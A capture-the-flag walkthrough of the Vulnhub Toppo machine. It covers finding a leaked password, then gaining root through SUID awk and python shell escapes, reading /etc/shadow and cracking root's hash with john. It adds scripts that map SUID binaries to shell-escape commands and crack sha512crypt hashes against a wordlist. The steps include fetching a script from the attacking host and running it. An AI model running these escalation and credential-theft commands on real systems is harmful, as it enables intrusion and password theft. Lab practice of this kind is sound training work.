Vulnhub Write-up — Toppo

This is a write-up of the Toppo machine from Vulnhub.

DIGEST

Toppo is a beginner-friendly Linux machine. A note left in the web server's admin directory gives away a user's password, and SUID executables are then abused to gain root.

Machine Author: Hadi
Machine Type: Linux
Machine Level: Beginner

The machine's IP address is given, so there is no need to run netdiscover to find it. In this walkthrough Toppo is 192.168.0.103 and the attacking machine is 192.168.0.105.


Scanning The Network

$ nmap -sC -sV 192.168.0.103
(see man nmap: -sC runs the default NSE scripts, -sV probes service versions)
[screenshot: nmap on Toppo]

DirBuster against port 80:

[screenshot: DirBuster result]

DirBuster finds notes.txt under the admin directory.

[screenshot: /admin/notes.txt]

The note gives us the password 12345ted123. The name embedded in it suggests the username ted, so let's try that pair against SSH.


Own User

Log in over SSH as ted with the password from the note, then confirm who we are:
$ whoami; id
(see man whoami, man id)
[screenshot: own user]

Privilege Escalation

I am using linuxprivchecker.py to enumerate possible privilege escalation vectors. First start a web server on the attacking machine so the script can be fetched from Toppo (Python 2's SimpleHTTPServer serves the current directory on port 8000; the Python 3 equivalent is python3 -m http.server):

$ python -m SimpleHTTPServer

[screenshot: starting the Python web server]

Find the attacking machine's IP address (192.168.0.105 here).

[screenshot: host machine IP]

Download the script onto Toppo, make it executable and run it:

$ wget http://192.168.0.105:8000/linuxprivchecker.py
(see man wget)
[screenshot: downloading the privchecker on Toppo]
$ chmod +x linuxprivchecker.py
$ ./linuxprivchecker.py

[screenshot: running the privchecker on Toppo]

Among other things the script lists the binaries with the SUID bit set, and awk is one of them. awk can run a shell through its system() function, so I try that one; the other listed binaries can be tried in the same way.

[screenshot: privchecker output]

Root using awk

$ awk 'BEGIN{system("/bin/sh")}'
(see man awk)
[screenshot: root shell via awk]

Spawning /bin/bash the same way did not give us root. When bash starts with an effective UID that differs from the real UID it resets the effective UID to the real one, unless it is started with -p. /bin/sh (dash on Debian-based systems) does nothing of the sort, so it keeps the root effective UID it inherits from the SUID awk.

Let's try a different privilege escalation method. While searching on the internet I found an article with the following find command for locating SUID/SGID files.

Root using python

$ find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
[screenshot: the find command from the article]
[screenshot: finding the SUID/SGID files]

As copied from the article the command had two problems: find's -o binds looser than the implicit -a, so "! -type l" and the -exec applied only to the -perm -4000 branch (SGID-only files matched but were never printed), and -maxdepth is a global option that find expects before the tests. Grouping the two -perm tests in \( \) and moving -maxdepth to the front fixes both. Either way the output shows python2.7 with the SUID bit set, so it can be exploited:

$ python2.7 -c "import pty; pty.spawn('/bin/sh')"
[screenshot: root shell via python]
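The enumeration that the privchecker and the find command above perform, as an added example that is not part of the original write-up and not taken from linuxprivchecker.py: a small POSIX shell script that lists SUID/SGID files with the find precedence fixed and flags those whose basename has a well-known shell escape (awk and python2.7 among them). The escape table is a hand-picked subset chosen for this example, and the --run flag is this example's own. It spawns /bin/sh rather than bash for the reason given above.

```shell
#!/bin/sh
# Added example, not from the write-up or from linuxprivchecker.py:
# enumerate SUID/SGID files under a directory and flag the ones whose
# basename has a well-known shell escape. The escape table is a small
# hand-picked subset (an assumption of this example, not a full catalogue).

# Print SUID or SGID regular files under $1 (default /), at most $2 levels
# deep (default 3). The two -perm tests are grouped in \( \) so that -type f
# and -print apply to both; -maxdepth goes first because it is a global option.
list_suid() {
    find "${1:-/}" -maxdepth "${2:-3}" \
        \( -perm -4000 -o -perm -2000 \) -type f -print 2>/dev/null
}

# Given a basename, print the command that gets a shell through that binary,
# or print nothing and return 1 if this table has no entry for it.
# /bin/sh is used rather than bash: bash would drop the effective UID
# unless started with -p.
suid_escape() {
    case "$1" in
        awk|mawk|gawk|nawk)
            printf '%s\n' "$1 'BEGIN{system(\"/bin/sh\")}'" ;;
        python|python2|python2.7|python3|python3.*)
            printf '%s\n' "$1 -c 'import pty; pty.spawn(\"/bin/sh\")'" ;;
        find)
            printf '%s\n' "find . -exec /bin/sh \\; -quit" ;;
        vi|vim)
            printf '%s\n' "$1 -c ':!/bin/sh'" ;;
        *)
            return 1 ;;
    esac
}

# Report every SUID/SGID file found, marking those with a known escape.
audit_suid() {
    list_suid "$1" "$2" | while IFS= read -r path; do
        bin=$(basename "$path")
        if esc=$(suid_escape "$bin"); then
            printf 'ESCAPE  %s  ->  %s\n' "$path" "$esc"
        else
            printf 'suid    %s\n' "$path"
        fi
    done
}

# Stand-alone use: sh audit_suid.sh --run  (three levels deep, like the
# write-up's find command).
if [ "${1:-}" = "--run" ]; then
    audit_suid / 3
fi
```

Run it on the target with --run and compare the ESCAPE lines against what the privchecker reported; anything SUID that is not in the table still deserves a manual look, since the table is deliberately short.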

Cracking the root password

The SUID awk runs with root's effective UID, so it can read /etc/shadow (the same trick reads any root-only file; /etc/passwd is world-readable anyway):

$ awk 'BEGIN{system("cat /etc/shadow")}'
[screenshot: /etc/shadow file]
$ awk 'BEGIN{system("cat /etc/passwd")}'
[screenshot: /etc/passwd file]

Copy both files to the attacking machine, merge them with unshadow (note the redirect: unshadow writes the merged file to stdout) and run john against the result. Root's hash starts with $6$, which is sha512crypt, so that is the format to tell john:

$ unshadow passwd shadow > crack
(see man unshadow)
[screenshot: unshadow of the passwd and shadow files]
$ john --wordlist=/usr/share/john/password.lst crack
(see man john)
[screenshot: john identifying the hash type]
$ john --wordlist=/usr/share/john/password.lst --format=sha512crypt crack
[screenshot: cracking the root password with john]
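What the unshadow and john steps do, as an added example that is not from the write-up or from John the Ripper: unshadow_merge reproduces the passwd/shadow merge in awk, and crack_sha512crypt runs a wordlist against a single $6$ hash using openssl passwd -6 (OpenSSL 1.1.1 or newer) in place of john. The passwd, shadow and wordlist contents, the salt Q9lkMqs3 and the throwaway password toor are constructed for the demo; the hash is generated at run time, so no real hash is embedded.

```shell
#!/bin/sh
# Added example, not from the write-up or from John the Ripper: what the
# "unshadow" and "john" steps do. unshadow_merge reproduces unshadow's
# passwd/shadow merge in awk; crack_sha512crypt runs a wordlist against one
# sha512crypt ($6$) hash using "openssl passwd -6" (OpenSSL 1.1.1+) instead
# of john. All file contents below are constructed for the demo.

# Merge passwd and shadow: the "x" in field 2 of each passwd line is replaced
# by the hash from the shadow line for the same user. $1 = passwd, $2 = shadow.
unshadow_merge() {
    awk -F: 'NR==FNR { hash[$1]=$2; next }
             { if ($1 in hash) $2=hash[$1]; print }' OFS=: "$2" "$1"
}

# Try each word of $2 against the hash $1 ($6$salt$digest). Prints the
# password and returns 0 on a hit, returns 1 when the wordlist is exhausted.
# Recomputing the hash with the entry's own salt is what john does per
# candidate; this version is just orders of magnitude slower.
crack_sha512crypt() {
    salt=$(printf '%s' "$1" | cut -d'$' -f3)
    while IFS= read -r word; do
        [ -n "$word" ] || continue
        if [ "$(openssl passwd -6 -salt "$salt" "$word")" = "$1" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Demo: build a passwd, a shadow (root hash generated from the throwaway
# password "toor"), merge them and crack root with a four-word list.
demo() {
    dir=$(mktemp -d)
    printf 'root:x:0:0:root:/root:/bin/bash\nted:x:1000:1000:,,,:/home/ted:/bin/bash\n' > "$dir/passwd"
    roothash=$(openssl passwd -6 -salt Q9lkMqs3 toor)
    printf 'root:%s:17000:0:99999:7:::\nted:!:17000:0:99999:7:::\n' "$roothash" > "$dir/shadow"
    printf 'password\n12345\ntoor\nletmein\n' > "$dir/wordlist"
    unshadow_merge "$dir/passwd" "$dir/shadow" > "$dir/crack"
    hash=$(awk -F: '$1=="root"{print $2}' "$dir/crack")
    crack_sha512crypt "$hash" "$dir/wordlist"
    rm -rf "$dir"
}

if [ "${1:-}" = "--run" ]; then
    demo
fi
```

Run with --run to see the merge and the hit on toor. The point of the merge is that john needs the hash (from shadow) next to the account metadata (from passwd) in one line; the point of the per-candidate rehash is why a slow, salted scheme like sha512crypt makes a wordlist attack cost one full hash computation per guess.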

Own Root

Log in as root with the cracked password and read the flag.
[screenshot: own root using the password]
Flag

0wnedlab{p4ssi0n_c0me_with_pract1ce}